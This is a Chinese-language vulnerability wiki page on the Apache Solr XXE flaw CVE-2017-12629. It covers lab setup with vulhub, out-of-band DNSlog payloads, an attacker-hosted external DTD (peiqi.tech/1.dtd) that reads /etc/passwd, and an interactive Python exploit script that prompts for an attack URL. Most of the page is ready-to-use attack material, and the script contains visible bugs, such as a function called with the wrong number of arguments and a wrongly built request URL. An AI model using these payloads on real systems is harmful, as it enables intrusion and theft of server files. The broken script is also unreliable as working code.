Apache Solr XXE 漏洞 CVE-2017-12629

漏洞描述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。

影响版本

Apache Solr < 7.1 Apache Lucene < 7.

环境搭建

https://github.com/vulhub/vulhub.git
cd vulhub/solr/CVE-2017-12629-XXE
docker-compose build
docker-compose up -d

漏洞复现

Dnslog

先请求url地址获取 core 内容

http://xxx.xxx.xxx.xxx:8983/solr/admin/cores

访问

http://xxx.xxx.xxx.xxx:8983/solr/demo/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxxxx.ceye.io"><a></a>'}&wt=xml

查看dnslog得到请求

远程读取文件

在自己的服务器上写入一个可访问的XML文件,内容写入

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

然后请求这个文件来读取服务器上的文件

http://xxx.xxx.xxx.xxx:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2fpeiqi.tech%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser

[!NOTE]

注意这里的payload进行了url编码,请求的文件为 http://peiqi.tech/1.dtd,有更多需求自行更改写入的xml文件

漏洞利用POC

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech

import requests
import sys
import json
import random

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')
    print('+  \033[34mVersion: Apache Solr < 7.1                                        \033[0m')
    print('+  \033[36m使用格式: python3 cve-2017-12629-xxe.py                             \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983                            \033[0m')
    print('+  \033[36mcmd    >>> dnslog地址(漏洞外连检测)                                  \033[0m')
    print('+  \033[36mCmd    >>> xxe_file(读取/etc/passwd)                               \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        sys.exit(0)

def POC_2(target_url, core_name, dnslog_url):
    dns_payload = """
        /solr/%s/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "%s"><a></a>'}&wt=xml
        """ % (core_name, dnslog_url)

    vuln_url = target_url + dnslog_url
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    try:
        response = requests.request("GET", url=vuln_url, headers=headers, timeout=30)
        if "HTTP ERROR 500" in response.text:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
        else:
            print("\033[32m[o] 请查看dnslog响应 \033[0m")
    except:
            print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_3(target_url, core_name):
    file_payload = """/solr/{}/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2fpeiqi.tech%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser""".format(core_name)
    vuln_url = target_url + file_payload

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }

    response = requests.request("GET", url=vuln_url, headers=headers, timeout=30)
    if "/usr/sbin" in response.text:
            print("\033[32m[o] 漏洞成功利用,响应为\n \033[0m",response.text)
    else:
            print("\033[31m[x] 漏洞利用失败 \033[0m")

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    core_name = POC_1(target_url)

    while True:
        n = random.randint(1, 9999)
        cmd = input("\033[35mCmd >>> \033[0m")
        if cmd == "exit":
            exit(0)
        elif cmd == "dnslog":
            dnslog_url = str(input('\033[35m请输入你的dnslog地址:\033[0m'))
            POC_2(target_url, core_name, dnslog_url, n)
        elif cmd == "xxe_file":
            POC_3(target_url, core_name)

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:43

results matching ""

    No results matching ""